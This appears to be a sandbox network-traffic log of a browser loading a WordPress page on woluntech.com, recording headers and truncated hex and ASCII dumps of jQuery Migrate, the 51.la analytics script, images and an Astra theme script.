2025-01-15 02:37:09 UTC	428	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 02:37:09 GMT Content-Type: application/javascript Content-Length: 11224 Last-Modified: Thu, 19 Nov 2020 09:31:13 GMT Connection: close Vary: Accept-Encoding ETag: "5fb63b61-2bd8" Expires: Thu, 15 Jan 2026 02:37:09 GMT Cache-Control: max-age=31536000 Strict-Transport-Security: max-age=31536000 Referrer-Policy: no-referrer-when-downgrade Accept-Ranges: bytes
2025-01-15 02:37:09 UTC	11224	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 33 2e 32 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 Data Ascii: /! jQuery Migrate v3.3.2 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r

Timestamp	Bytes transferred	Direction	Data
2025-01-15 02:37:09 UTC	350	OUT	GET /js-sdk-pro.min.js HTTP/1.1 Host: sdk.51.la Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 02:37:10 UTC	433	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 02:37:09 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Server: openresty Cache-Control: no-store Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true via: EU-GER-frankfurt-EDGE5-CACHE6[167],EU-GER-frankfurt-EDGE5-CACHE6[ovl,161],CHN-HElangfang-GLOBAL6-CACHE10[ovl,17] X-CCDN-REQ-ID-46B1: e19ee75726075ceb3e21a642ca407ed9
2025-01-15 02:37:10 UTC	15951	IN	Data Raw: 34 61 36 0d 0a 2f 2a 21 0a 2a 20 35 31 4c 41 20 41 6e 61 6c 79 73 69 73 20 4a 61 76 61 73 63 72 69 70 74 20 53 6f 66 74 77 61 72 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 20 4b 69 74 0a 2a 20 6a 73 2d 73 64 6b 2d 70 72 6f 20 76 31 2e 35 38 2e 33 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 31 36 2d 32 30 32 32 20 35 31 2e 6c 61 20 41 6c 6c 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 0a 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2c 67 3d 65 5b 27 64 6f 63 75 6d 65 6e 74 27 5d 2c 68 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 2c 69 3d 41 28 27 4f 62 6a 65 63 74 27 29 2c 6a 3d 41 28 27 4e 75 6d 62 65 72 27 29 2c 6b 3d 41 28 27 53 74 72 69 6e 67 27 29 2c 6d Data Ascii: 4a6/! 51LA Analysis Javascript Software Development Kit* js-sdk-pro v1.58.3* Copyright 2016-2022 51.la All Rights Reserved*/(function(c){'use strict';var e=window,g=e['document'],h=encodeURIComponent,i=A('Object'),j=A('Number'),k=A('String'),m
2025-01-15 02:37:10 UTC	16384	IN	Data Raw: 6e 64 65 78 4f 66 27 5d 28 27 72 76 3a 27 29 2c 70 61 72 73 65 49 6e 74 28 66 69 5b 27 73 75 62 73 74 72 69 6e 67 27 5d 28 66 68 2b 30 78 33 2c 66 69 5b 27 69 6e 64 65 78 4f 66 27 5d 28 27 2e 27 2c 66 68 29 29 2c 30 78 61 29 29 3a 28 66 66 3d 66 69 5b 27 69 6e 64 65 78 4f 66 27 5d 28 27 45 64 67 65 2f 27 29 29 3e 30 78 30 26 26 70 61 72 73 65 49 6e 74 28 66 69 5b 27 73 75 62 73 74 72 69 6e 67 27 5d 28 66 66 2b 30 78 35 2c 66 69 5b 27 69 6e 64 65 78 4f 66 27 5d 28 27 2e 27 2c 66 66 29 29 2c 30 78 61 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 66 6a 28 66 6b 2c 66 6c 2c 66 6d 29 7b 76 61 72 20 66 6e 2c 66 6f 2c 66 70 2c 66 71 2c 66 72 2c 66 73 2c 66 74 2c 66 75 3d 5b 5d 2c 66 76 3d 5b 5d 2c 66 77 3d 30 78 30 2c 66 78 3d 66 65 28 29 7c 7c 4e 61 4e 3b 66 75 6e 63 74 Data Ascii: ndexOf']('rv:'),parseInt(fi['substring'](fh+0x3,fi['indexOf']('.',fh)),0xa)):(ff=fi['indexOf']('Edge/'))>0x0&&parseInt(fi['substring'](ff+0x5,fi['indexOf']('.',ff)),0xa);}function fj(fk,fl,fm){var fn,fo,fp,fq,fr,fs,ft,fu=[],fv=[],fw=0x0,fx=fe()\|\|NaN;funct
2025-01-15 02:37:10 UTC	3670	IN	Data Raw: 72 73 65 74 27 2c 27 55 54 46 2d 38 27 29 2c 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 27 5d 28 27 68 65 61 64 27 29 5b 30 78 30 5d 5b 27 61 70 70 65 6e 64 43 68 69 6c 64 27 5d 28 6a 6b 29 2c 6a 6b 5b 27 72 65 61 64 79 53 74 61 74 65 27 5d 3f 6a 6b 5b 27 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 28 27 63 6f 6d 70 6c 65 74 65 27 3d 3d 6a 6b 5b 27 72 65 61 64 79 53 74 61 74 65 27 5d 7c 7c 27 6c 6f 61 64 65 64 27 3d 3d 6a 6b 5b 27 72 65 61 64 79 53 74 61 74 65 27 5d 29 26 26 6a 69 26 26 6a 69 28 29 3b 7d 3a 6a 6b 5b 27 6f 6e 6c 6f 61 64 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 69 26 26 6a 69 28 29 3b 7d 3b 7d 66 75 6e 63 74 69 6f 6e 20 6a 6c 28 29 7b 76 Data Ascii: rset','UTF-8'),document['getElementsByTagName']('head')[0x0]['appendChild'](jk),jk['readyState']?jk['onreadystatechange']=function(){('complete'==jk['readyState']\|\|'loaded'==jk['readyState'])&&ji&&ji();}:jk['onload']=function(){ji&&ji();};}function jl(){v

Timestamp	Bytes transferred	Direction	Data
2025-01-15 02:37:09 UTC	1037	OUT	GET /wp-content/plugins/translatepress-multilingual/assets/images/flags/en_US.png HTTP/1.1 Host: www.woluntech.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.woluntech.com/oders-pdf/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: __vtins__JkTxQygsh7aRdaE2=%7B%22sid%22%3A%20%22f18abd8e-11c8-58bc-96b0-71b672707f1e%22%2C%20%22vd%22%3A%201%2C%20%22stt%22%3A%200%2C%20%22dr%22%3A%200%2C%20%22expires%22%3A%201736910428193%2C%20%22ct%22%3A%201736908628193%7D; __51uvsct__JkTxQygsh7aRdaE2=1; __51vcke__JkTxQygsh7aRdaE2=10f2224e-8575-547c-aad3-ec407800c17a; __51vuft__JkTxQygsh7aRdaE2=1736908628199
2025-01-15 02:37:09 UTC	389	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 02:37:09 GMT Content-Type: image/png Content-Length: 502 Last-Modified: Sat, 26 Oct 2024 07:40:32 GMT Connection: close ETag: "671c9cf0-1f6" Expires: Thu, 15 Jan 2026 02:37:09 GMT Cache-Control: max-age=31536000 Strict-Transport-Security: max-age=31536000 Referrer-Policy: no-referrer-when-downgrade Accept-Ranges: bytes
2025-01-15 02:37:09 UTC	502	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 12 00 00 00 0c 08 02 00 00 00 e0 70 7a eb 00 00 00 2b 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 7a 61 20 33 31 20 64 65 63 20 32 30 30 35 20 31 37 3a 31 33 3a 31 37 20 2b 30 31 30 30 72 04 c3 22 00 00 00 07 74 49 4d 45 07 d5 0c 1f 10 14 10 6c 92 e9 b5 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 01 4e 49 44 41 54 78 da 8d 92 cd 4a c3 40 14 85 67 4a 42 1a ad 4d da 20 14 ac 2e a4 14 5c b9 ee 0b d8 bd 2b 37 ee fb 28 85 be 89 8f a0 e0 42 17 05 57 82 6b 85 88 34 a4 ed 64 32 93 bf 49 66 92 71 5a 77 1a 69 0f 67 71 99 73 be 0b 03 17 8e 46 8f 10 16 ab d5 2a 8a 48 af 67 e9 7a 43 08 79 f7 39 1b e8 3e f8 ab aa 0a a5 0c aa 4a 4b Data Ascii: PNGIHDRpz+tEXtCreation Timeza 31 dec 2005 17:13:17 +0100r"tIMElpHYs~gAMAaNIDATxJ@gJBM .\+7(BWk4d2IfqZwigqsF*HgzCy9>JK

Timestamp	Bytes transferred	Direction	Data
2025-01-15 02:37:09 UTC	630	OUT	GET /wp-content/uploads/2025/01/Captureddd.jpg HTTP/1.1 Host: www.woluntech.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.woluntech.com/oders-pdf/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 02:37:09 UTC	392	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 02:37:09 GMT Content-Type: image/jpeg Content-Length: 6664 Last-Modified: Tue, 14 Jan 2025 02:22:47 GMT Connection: close ETag: "6785ca77-1a08" Expires: Thu, 15 Jan 2026 02:37:09 GMT Cache-Control: max-age=31536000 Strict-Transport-Security: max-age=31536000 Referrer-Policy: no-referrer-when-downgrade Accept-Ranges: bytes
2025-01-15 02:37:09 UTC	6664	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 03 00 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 04 01 3b 00 02 00 00 00 12 00 00 01 4a 87 69 00 04 00 00 00 01 00 00 01 5c 9c 9d 00 01 00 00 00 24 00 00 02 d4 ea 1c 00 07 00 00 01 0c 00 00 00 3e 00 00 00 00 1c ea 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: JFIF``ExifMM*;Ji\$>

Timestamp	Bytes transferred	Direction	Data
2025-01-15 02:37:10 UTC	597	OUT	GET /wp-content/themes/astra/assets/js/minified/frontend.min.js?ver=3.7.9 HTTP/1.1 Host: www.woluntech.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.woluntech.com/oders-pdf/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 02:37:10 UTC	428	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 02:37:10 GMT Content-Type: application/javascript Content-Length: 16290 Last-Modified: Mon, 07 Mar 2022 04:29:27 GMT Connection: close Vary: Accept-Encoding ETag: "62258a27-3fa2" Expires: Thu, 15 Jan 2026 02:37:10 GMT Cache-Control: max-age=31536000 Strict-Transport-Security: max-age=31536000 Referrer-Policy: no-referrer-when-downgrade Accept-Ranges: bytes
2025-01-15 02:37:10 UTC	15956	IN	Data Raw: 76 61 72 20 61 73 74 72 61 47 65 74 50 61 72 65 6e 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 7c 7c 28 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 3d 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 6f 7a 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 77 65 62 Data Ascii: var astraGetParents=function(e,t){Element.prototype.matches\|\|(Element.prototype.matches=Element.prototype.matchesSelector\|\|Element.prototype.mozMatchesSelector\|\|Element.prototype.msMatchesSelector\|\|Element.prototype.oMatchesSelector\|\|Element.prototype.web
2025-01-15 02:37:10 UTC	334	IN	Data Raw: 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 61 73 74 2d 73 65 61 72 63 68 2d 6d 65 6e 75 2d 69 63 6f 6e 22 29 2c 61 3d 30 3b 61 3c 74 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 74 5b 61 5d 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 61 73 74 2d 64 72 6f 70 64 6f 77 6e 2d 61 63 74 69 76 65 22 29 7d 2c 22 71 75 65 72 79 53 65 6c 65 63 74 6f 72 22 69 6e 20 64 6f 63 75 6d 65 6e 74 26 26 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 69 6e 20 77 69 6e 64 6f 77 26 26 28 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 61 73 74 2d 6d 6f 75 73 65 2d 63 6c 69 63 6b 65 64 22 29 7d 29 2c 64 2e 61 64 64 45 76 Data Ascii: ElementsByClassName("ast-search-menu-icon"),a=0;a<t.length;a++)t[a].classList.remove("ast-dropdown-active")},"querySelector"in document&&"addEventListener"in window&&(d.addEventListener("mousedown",function(){d.classList.add("ast-mouse-clicked")}),d.addEv